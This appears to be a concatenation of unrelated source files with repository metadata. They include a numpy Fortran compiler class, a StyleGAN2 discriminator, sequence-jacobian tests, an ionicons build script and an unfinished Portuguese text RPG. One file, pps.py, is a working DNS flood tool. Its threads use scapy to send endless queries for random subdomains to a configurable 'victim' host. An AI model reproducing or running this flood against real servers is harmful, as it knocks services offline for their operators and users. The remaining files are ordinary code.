packaged_services.append(ParseJSONFile(child_manifest))
if len(packaged_services) > 0:
if "services" not in parent:
parent["services"] = packaged_services
else:
parent["services"].extend(packaged_services)
for overlay_path in args.overlays:
MergeManifestOverlay(parent, ParseJSONFile(overlay_path))
with open(args.output, "w") as output_file:
json.dump(parent, output_file, indent=2 if args.pretty else -1)
# NOTE: We do the sanity check and possible failure *after* outputting the
# aggregate manifest so it's easier to inspect erroneous output.
SanityCheckManifestServices(parent)
return 0
if __name__ == "__main__":
sys.exit(main())
| 29.175182 | 76 | 0.694021 |
5560e199aac68e390d0d8c9f15e4f64ab1d15f1c | 1,460 | py | Python | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | 4 | 2020-01-28T08:48:27.000Z | 2022-02-09T18:45:34.000Z | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | 1 | 2015-10-08T10:27:03.000Z | 2015-10-08T10:27:03.000Z | from __future__ import division, absolute_import, print_function
from numpy.distutils.fcompiler import FCompiler
compilers = ['HPUXFCompiler']
class HPUXFCompiler(FCompiler):
compiler_type = 'hpux'
description = 'HP Fortran 90 Compiler'
version_pattern = r'HP F90 (?P<version>[^\s*,]*)'
executables = {
'version_cmd' : ["f90", "+version"],
'compiler_f77' : ["f90"],
'compiler_fix' : ["f90"],
'compiler_f90' : ["f90"],
'linker_so' : ["ld", "-b"],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
module_dir_switch = None #XXX: fix me
module_include_switch = None #XXX: fix me
pic_flags = ['+Z']
def get_flags(self):
return self.pic_flags + ['+ppu', '+DD64']
def get_flags_opt(self):
return ['-O3']
def get_libraries(self):
return ['m']
def get_library_dirs(self):
opt = ['/usr/lib/hpux64']
return opt
def get_version(self, force=0, ok_status=[256,0,1]):
# XXX status==256 may indicate 'unrecognized option' or
# 'no input file'. So, version_cmd needs more work.
return FCompiler.get_version(self,force,ok_status)
if __name__ == '__main__':
from distutils import log
log.set_verbosity(10)
from numpy.distutils.fcompiler import new_fcompiler
compiler = new_fcompiler(compiler='hpux')
compiler.customize()
print(compiler.get_version())
| 31.73913 | 64 | 0.612329 |
e106b2f00fe254cf234ec39b6ade4b0a24480846 | 213 | py | Python | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | from .model import ModelSummarizer
import numpy as np
class Median(ModelSummarizer):
"""
Median State Summarizer
"""
def __init__(self):
super(Median, self).__init__(np_sum_fn=np.median)
| 19.363636 | 57 | 0.690141 |
5005503ccffe9e23891bbcef6ee608dfc86fde28 | 2,026 | py | Python | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | 3 | 2015-02-26T22:38:59.000Z | 2019-09-17T22:22:28.000Z | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | null | null | null | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | null | null | null | #!/bin/python
import sys
import threading
from scapy.config import conf
conf.ipv6_enabled = False
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import fcntl, socket, struct
from collections import OrderedDict
from time import sleep
from httplib import HTTPConnection, _CS_IDLE
import urlparse, string, random
victim = os.getenv('TARGET', '127.0.0.1')
dst_mac = None
while dst_mac == None:
dst_mac = getmacbyip(victim)
interface = conf.route.route(victim)[0]
threads = os.getenv('THREADS', '10')
def getHwAddr(ifname):
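    # 0x8927 is the Linux SIOCGIFHWADDR ioctl; the packed reply carries the
    # interface's hardware (MAC) address starting at byte offset 18.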
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
class RandNormalIP(RandString):
def __init__(self, iptemplate="0.0.0.0/0"):
self.ip = Net(iptemplate)
def _fix(self):
x = self.ip.choice()
while ((x in Net("0.0.0.0/8")) or (x in Net("10.0.0.0/8")) or (x in Net("127.0.0.0/8"))
or (x in Net("172.16.0.0/12")) or (x in Net("192.168.0.0/16")) or (x in Net("224.0.0.0/4"))):
x = self.ip.choice()
return x
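        # Keep redrawing until the address falls outside the private,
        # loopback and multicast ranges listed above, so sampled sources
        # look like routable public IPs.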
class RandFinalString(RandString):
def __init__(self, size, term):
RandString.__init__(self, size)
self.term = term
def _fix(self):
return RandString._fix(self)+self.term
class attack(threading.Thread):
def __init__ (self):
threading.Thread.__init__(self)
def run(self):
print('Sending DNS A queries for <random>.domain.net to '+victim+' ('+dst_mac+') from '+interface+' interface. Press Ctrl-C to interrupt')
while True:
sendp(Ether(src=getHwAddr(interface),dst=dst_mac)/IP(dst=victim)/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname=RandFinalString(10,".domain.net"))),iface=interface,inter=0,loop=1)
# Spawn one attack thread per configured worker. Quirk preserved from the
# original: threads only start when no second CLI argument is supplied,
# because a present sys.argv[2] skips the except branch entirely.
for host in range(int(threads)):
    try:
        port = sys.argv[2]
    except IndexError:
        at = attack()
        at.start()
| 33.213115 | 197 | 0.653504 |
8acea70ede149f8c662b46cf0e9c0302f98d1126 | 5,107 | py | Python | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 3 | 2022-02-20T11:40:50.000Z | 2022-02-20T11:46:29.000Z | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 38 | 2021-10-14T12:55:45.000Z | 2021-12-24T06:09:10.000Z | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 1 | 2021-09-22T09:29:19.000Z | 2021-09-22T09:29:19.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# code was heavily based on https://github.com/rosinality/stylegan2-pytorch
# MIT License
# Copyright (c) 2019 Kim Seonghyeon
import math
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from .builder import DISCRIMINATORS
from ...modules.equalized import EqualLinear, EqualConv2D
from ...modules.fused_act import FusedLeakyReLU
from ...modules.upfirdn2d import Upfirdn2dBlur
class ConvLayer(nn.Sequential):
def __init__(
self,
in_channel,
out_channel,
kernel_size,
downsample=False,
blur_kernel=[1, 3, 3, 1],
bias=True,
activate=True,
):
layers = []
if downsample:
factor = 2
p = (len(blur_kernel) - factor) + (kernel_size - 1)
pad0 = (p + 1) // 2
pad1 = p // 2
layers.append(Upfirdn2dBlur(blur_kernel, pad=(pad0, pad1)))
stride = 2
self.padding = 0
else:
stride = 1
self.padding = kernel_size // 2
layers.append(
EqualConv2D(
in_channel,
out_channel,
kernel_size,
padding=self.padding,
stride=stride,
bias=bias and not activate,
))
if activate:
layers.append(FusedLeakyReLU(out_channel, bias=bias))
super().__init__(*layers)
class ResBlock(nn.Layer):
def __init__(self, in_channel, out_channel, blur_kernel=[1, 3, 3, 1]):
super().__init__()
self.conv1 = ConvLayer(in_channel, in_channel, 3)
self.conv2 = ConvLayer(in_channel, out_channel, 3, downsample=True)
self.skip = ConvLayer(in_channel,
out_channel,
1,
downsample=True,
activate=False,
bias=False)
def forward(self, input):
out = self.conv1(input)
out = self.conv2(out)
skip = self.skip(input)
out = (out + skip) / math.sqrt(2)
return out
# temporarily work around the pow double-grad problem by computing variance manually
def var(x, axis=None, unbiased=True, keepdim=False, name=None):
u = paddle.mean(x, axis, True, name)
out = paddle.sum((x - u) * (x - u), axis, keepdim=keepdim, name=name)
n = paddle.cast(paddle.numel(x), x.dtype) \
/ paddle.cast(paddle.numel(out), x.dtype)
if unbiased:
one_const = paddle.ones([1], x.dtype)
n = paddle.where(n > one_const, n - 1., one_const)
out /= n
return out
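    # This reproduces Var[x] = sum((x - mean)^2) / (n - 1) (or / n when
    # unbiased=False) without calling paddle.pow, keeping second-order
    # gradients usable.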
@DISCRIMINATORS.register()
class StyleGANv2Discriminator(nn.Layer):
def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1]):
super().__init__()
channels = {
4: 512,
8: 512,
16: 512,
32: 512,
64: 256 * channel_multiplier,
128: 128 * channel_multiplier,
256: 64 * channel_multiplier,
512: 32 * channel_multiplier,
1024: 16 * channel_multiplier,
}
convs = [ConvLayer(3, channels[size], 1)]
log_size = int(math.log(size, 2))
in_channel = channels[size]
for i in range(log_size, 2, -1):
out_channel = channels[2**(i - 1)]
convs.append(ResBlock(in_channel, out_channel, blur_kernel))
in_channel = out_channel
self.convs = nn.Sequential(*convs)
self.stddev_group = 4
self.stddev_feat = 1
self.final_conv = ConvLayer(in_channel + 1, channels[4], 3)
self.final_linear = nn.Sequential(
EqualLinear(channels[4] * 4 * 4,
channels[4],
activation="fused_lrelu"),
EqualLinear(channels[4], 1),
)
def forward(self, input):
out = self.convs(input)
batch, channel, height, width = out.shape
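        # Minibatch standard deviation (the StyleGAN trick): compute per-group
        # feature stddev, average it down to one scalar map, and append it as
        # an extra channel so the discriminator can sense sample diversity.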
group = min(batch, self.stddev_group)
stddev = out.reshape((group, -1, self.stddev_feat,
channel // self.stddev_feat, height, width))
stddev = paddle.sqrt(var(stddev, 0, unbiased=False) + 1e-8)
stddev = stddev.mean([2, 3, 4], keepdim=True).squeeze(2)
stddev = stddev.tile((group, 1, height, width))
out = paddle.concat([out, stddev], 1)
out = self.final_conv(out)
out = out.reshape((batch, -1))
out = self.final_linear(out)
return out
| 29.350575 | 77 | 0.574114 |
74c05c62bfd4ff7e339c65e80af8369cb9254fef | 2,593 | py | Python | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from sequence_jacobian.examples import krusell_smith
def test_jacobian_h(krusell_smith_dag):
_, ss, dag, *_ = krusell_smith_dag
hh = dag['hh']
lowacc = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=0.05)
midacc = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=1E-3)
usual = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=1E-4)
nooption = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10)
assert np.array_equal(usual['C','r'], nooption['C','r'])
assert np.linalg.norm(usual['C','r'] - midacc['C','r']) < np.linalg.norm(usual['C','r'] - lowacc['C','r'])
midacc_alt = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, options={'hh': {'h': 1E-3}})
assert np.array_equal(midacc['C', 'r'], midacc_alt['C', 'r'])
lowacc = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 0.05}})
midacc = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 1E-3}})
usual = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 1E-4}})
assert np.linalg.norm(usual['C','K'] - midacc['C','K']) < np.linalg.norm(usual['C','K'] - lowacc['C','K'])
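    # h is the finite-difference step used when differentiating the
    # heterogeneous-agent block, so the mid-sized step should land closer to
    # the h=1e-4 baseline than the coarse 0.05 step does.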
def test_jacobian_steady_state(krusell_smith_dag):
dag = krusell_smith_dag[2]
calibration = {"eis": 1, "delta": 0.025, "alpha": 0.11, "rho": 0.966, "sigma": 0.5,
"L": 1.0, "nS": 2, "nA": 10, "amax": 200, "r": 0.01, 'beta': 0.96,
"Z": 0.85, "K": 3.}
pytest.raises(ValueError, dag.steady_state, calibration, options={'hh': {'backward_maxit': 10}})
ss1 = dag.steady_state(calibration)
ss2 = dag.steady_state(calibration, options={'hh': {'backward_maxit': 100000}})
assert ss1['A'] == ss2['A']
def test_steady_state_solution(krusell_smith_dag):
dag_ss, ss, *_ = krusell_smith_dag
calibration = {'eis': 1.0, 'delta': 0.025, 'alpha': 0.11, 'rho': 0.966, 'sigma': 0.5,
'Y': 1.0, 'L': 1.0, 'nS': 2, 'nA': 10, 'amax': 200, 'r': 0.01}
unknowns_ss = {'beta': (0.98 / 1.01, 0.999 / 1.01)}
targets_ss = {'asset_mkt': 0.}
# less accurate solution
ss2 = dag_ss.solve_steady_state(calibration, unknowns_ss, targets_ss, solver="brentq",
ttol=1E-2, ctol=1E-2)
assert not np.isclose(ss['asset_mkt'], ss2['asset_mkt'])
# different solution method (Newton needs other inputs)
with pytest.raises(ValueError):
ss3 = dag_ss.solve_steady_state(calibration, unknowns_ss, targets_ss,
solver="newton")
| 43.949153 | 110 | 0.576552 |
3bd29e6a9a3c3115b29c7865ac3245a673a7b68b | 9,429 | py | Python | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | from subprocess import call
import os
import json
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.join(BUILDER_PATH, '..')
FONTS_FOLDER_PATH = os.path.join(ROOT_PATH, 'fonts')
CSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'css')
SCSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'scss')
LESS_FOLDER_PATH = os.path.join(ROOT_PATH, 'less')
def main():
generate_font_files()
data = get_build_data()
rename_svg_glyph_names(data)
generate_scss(data)
generate_less(data)
generate_cheatsheet(data)
generate_component_json(data)
generate_composer_json(data)
generate_bower_json(data)
def generate_font_files():
print "Generate Fonts"
cmd = "fontforge -script %s/scripts/generate_font.py" % (BUILDER_PATH)
call(cmd, shell=True)
def rename_svg_glyph_names(data):
# hacky and slow (but safe) way to rename glyph-name attributes
svg_path = os.path.join(FONTS_FOLDER_PATH, 'ionicons.svg')
svg_file = open(svg_path, 'r+')
svg_text = svg_file.read()
svg_file.seek(0)
for ionicon in data['icons']:
# uniF2CA
org_name = 'uni%s' % (ionicon['code'].replace('0x', '').upper())
ion_name = 'ion-%s' % (ionicon['name'])
svg_text = svg_text.replace(org_name, ion_name)
svg_file.write(svg_text)
svg_file.close()
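# A possibly faster single-pass variant of the rename above (a sketch, not the
# build's actual code; assumes every glyph code is a 4-digit BMP codepoint):
#
#   import re
#   def rename_svg_glyph_names_fast(data, svg_text):
#       mapping = dict(('uni%s' % i['code'].replace('0x', '').upper(),
#                       'ion-%s' % i['name']) for i in data['icons'])
#       return re.sub(r'uni[0-9A-F]{4}',
#                     lambda m: mapping.get(m.group(0), m.group(0)), svg_text)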
def generate_less(data):
print "Generate LESS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(LESS_FOLDER_PATH, '_ionicons-variables.less')
icons_file_path = os.path.join(LESS_FOLDER_PATH, '_ionicons-icons.less')
d = []
    d.append('/*!')
    d.append('Ionicons, v%s' % (font_version) )
    d.append('Created by Ben Sperry for the Ionic Framework, http://ionicons.com/')
    d.append('https://twitter.com/benjsperry https://twitter.com/ionicframework')
    d.append('MIT License: https://github.com/driftyco/ionicons')
    d.append('*/')
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('@ionicons-font-path: "../fonts";')
d.append('@ionicons-font-family: "%s";' % (font_name) )
d.append('@ionicons-version: "%s";' % (font_version) )
d.append('@ionicons-prefix: %s;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('@ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.@{ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' &:extend(.ion);')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.@{ionicons-prefix}%s:before { content: @ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
def generate_scss(data):
print "Generate SCSS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-variables.scss')
icons_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-icons.scss')
d = []
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('$ionicons-font-path: "../fonts" !default;')
d.append('$ionicons-font-family: "%s" !default;' % (font_name) )
d.append('$ionicons-version: "%s" !default;' % (font_version) )
d.append('$ionicons-prefix: %s !default;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('$ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.#{$ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' @extend .ion;')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.#{$ionicons-prefix}%s:before { content: $ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
generate_css_from_scss(data)
def generate_css_from_scss(data):
print "Generate CSS From SCSS"
scss_file_path = os.path.join(SCSS_FOLDER_PATH, 'ionicons.scss')
css_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.css')
css_min_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.min.css')
cmd = "sass %s %s --style compact" % (scss_file_path, css_file_path)
call(cmd, shell=True)
print "Generate Minified CSS From SCSS"
cmd = "sass %s %s --style compressed" % (scss_file_path, css_min_file_path)
call(cmd, shell=True)
def generate_cheatsheet(data):
print "Generate Cheatsheet"
cheatsheet_file_path = os.path.join(ROOT_PATH, 'cheatsheet.html')
template_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'template.html')
icon_row_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'icon-row.html')
f = open(template_path, 'r')
template_html = f.read()
f.close()
f = open(icon_row_path, 'r')
icon_row_template = f.read()
f.close()
content = []
for ionicon in data['icons']:
css_code = ionicon['code'].replace('0x', '\\')
escaped_html_code = ionicon['code'].replace('0x', '&#x') + ';'
html_code = ionicon['code'].replace('0x', '&#x') + ';'
item_row = icon_row_template
item_row = item_row.replace('{{name}}', ionicon['name'])
item_row = item_row.replace('{{prefix}}', data['prefix'])
item_row = item_row.replace('{{css_code}}', css_code)
item_row = item_row.replace('{{escaped_html_code}}', escaped_html_code)
item_row = item_row.replace('{{html_code}}', html_code)
content.append(item_row)
template_html = template_html.replace("{{font_name}}", data["name"])
template_html = template_html.replace("{{font_version}}", data["version"])
template_html = template_html.replace("{{icon_count}}", str(len(data["icons"])) )
template_html = template_html.replace("{{content}}", '\n'.join(content) )
f = open(cheatsheet_file_path, 'w')
f.write(template_html)
f.close()
def generate_component_json(data):
print "Generate component.json"
d = {
"name": data['name'],
"repo": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"version": data['version'],
"keywords": [],
"dependencies": {},
"development": {},
"license": "MIT",
"styles": [
"css/%s.css" % (data['name'].lower())
],
"fonts": [
"fonts/%s.eot" % (data['name'].lower()),
"fonts/%s.svg" % (data['name'].lower()),
"fonts/%s.ttf" % (data['name'].lower()),
"fonts/%s.woff" % (data['name'].lower())
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
component_file_path = os.path.join(ROOT_PATH, 'component.json')
f = open(component_file_path, 'w')
f.write(txt)
f.close()
def generate_composer_json(data):
print "Generate composer.json"
d = {
"name": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"homepage": "http://ionicons.com/",
"authors": [
{
"name": "Ben Sperry",
"email": "ben@drifty.com",
"role": "Designer",
"homepage": "https://twitter.com/benjsperry"
},
{
"name": "Adam Bradley",
"email": "adam@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/adamdbradley"
},
{
"name": "Max Lynch",
"email": "max@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/maxlynch"
}
],
"extra": {},
"license": [ "MIT" ]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
composer_file_path = os.path.join(ROOT_PATH, 'composer.json')
f = open(composer_file_path, 'w')
f.write(txt)
f.close()
def generate_bower_json(data):
print "Generate bower.json"
d = {
"name": data['name'],
"version": data['version'],
"homepage": "https://github.com/driftyco/ionicons",
"authors": [
"Ben Sperry <ben@drifty.com>",
"Adam Bradley <adam@drifty.com>",
"Max Lynch <max@drifty.com>"
],
"description": "Ionicons - free and beautiful icons from the creators of Ionic Framework",
"main": [
"css/%s.css" % (data['name'].lower()),
"fonts/*"
],
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"license": "MIT",
"ignore": [
"**/.*",
"builder",
"node_modules",
"bower_components",
"test",
"tests"
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
bower_file_path = os.path.join(ROOT_PATH, 'bower.json')
f = open(bower_file_path, 'w')
f.write(txt)
f.close()
def get_build_data():
build_data_path = os.path.join(BUILDER_PATH, 'build_data.json')
f = open(build_data_path, 'r')
data = json.loads(f.read())
f.close()
return data
if __name__ == "__main__":
main()
| 29.557994 | 113 | 0.617033 |
ba50c8bbafa0140b7cc9f1f2facafba5fbda8afa | 15,083 | py | Python | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | #Prototipo#
def RPG():
nome=input("Qual nome de seu personagem? ")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
return "Boa escola caro, " + classe
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
        classe=input("Qual sua classe?: ")
return "Otima escolha majestade... ou melhor dizendo, " + classe
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
        classe=input("Qual sua classe?: ")
return "Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA"
else:
return "Esta raca nao existe. Por favor escolha uma raca valida."
#############################################################
import cmd
import textwrap
import sys
import os
import time
import random
screen_width=100
def cls(): #call clear
os.system('cls' if os.name=='nt' else 'clear')
##Player Setup##
class player:
def __init__(self):
self.name=''
self.hp=0
self.mp=0
self.status_effects=[]
self.location="start"
myPlayer=player()
######Title screen#########
def title_screen_selections():
option=input("> ")
if option.lower()==('jogar'):
start_game()
elif option.lower()==('ajuda'):
help_menu()
elif option.lower()==('sair'):
sys.exit()
while option.lower() not in ['jogar', 'ajuda' , 'sair']:
print ("Por favor escolha uma opcao válida!")
option=input("> ")
        if option.lower()==('jogar'):
            start_game()
        elif option.lower()==('ajuda'):
            help_menu()
        elif option.lower()==('sair'):
            sys.exit()
def main(): #title_screen
print ("#############################")
print ("Bem-vindo à Dragons Fury!!")
print ("#############################")
print (" ~Jogar~ ")
print (" ~Ajuda~ ")
print (" ~Sair~ ")
title_screen_selections()
def help_menu():
print ("###############")
print (" -Faca suas escolhas digitando-as!")
print (" -Este game tem uma historia propria dependendo de qual raca foi escolhida ")
print (" voce pode escolher o modo em que as historias irao terminar!")
print ("O jogo eh apenas um pequeno projeto de um iniciante em programacao entao nao serao historias muito longas.")
print ("Suas escolhas nao impactarao necessariamente o final das historias mas haverao situacoes diferentes com que voce ira enfrentar no meio do caminho (estas sim dependentes de suas escolhas)")
print (" -O sistema de batalha funciona como um RPG de mesa onde usa-se dados(ou seja, numeros aleatorios) somando-as com o status de seu personagem.")
print(" -Podes escolher a classe que quiser mas se não existir dentro do jogo seu item inicial sera apenas equipamentos basicos: adaga inicial e armadura de couro.")
print (" -As classes existentes são: Guerreiro, Espadachim, Gladiador, Barbaro, Paladino, Arqueiro, Cacador, Ninja, Samurai, Lutador, Monge, Curandeiro, Mago, Bruxo, Feiticeiro, Mago, Druida, Xama, Sentinela, Guardiao")
print (" Digite -DESCRICAO,EXAMINACAO, UP,DOWN, LEFT, RIGHT para interagir c o mapa")
print (" -Boa sorte e divirta-se!")
print ("###############")
title_screen_selections()
#Game functionality
def start_game():
nome=input("Qual nome de seu personagem? ")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
print ("Boa escola caro, " + classe)
classe_armainicial(classe)
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha majestade... ou melhor dizendo, " + classe)
classe_armainicial(classe)
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA")
classe_armainicial(classe)
while raca not in ['orc', 'humano' , 'elfo']:
print ("Por favor escolha uma opcao válida!")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
print ("Boa escolha caro, " + classe)
classe_armainicial(classe)
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha majestade... ou melhor dizendo, " + classe)
classe_armainicial(classe)
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA")
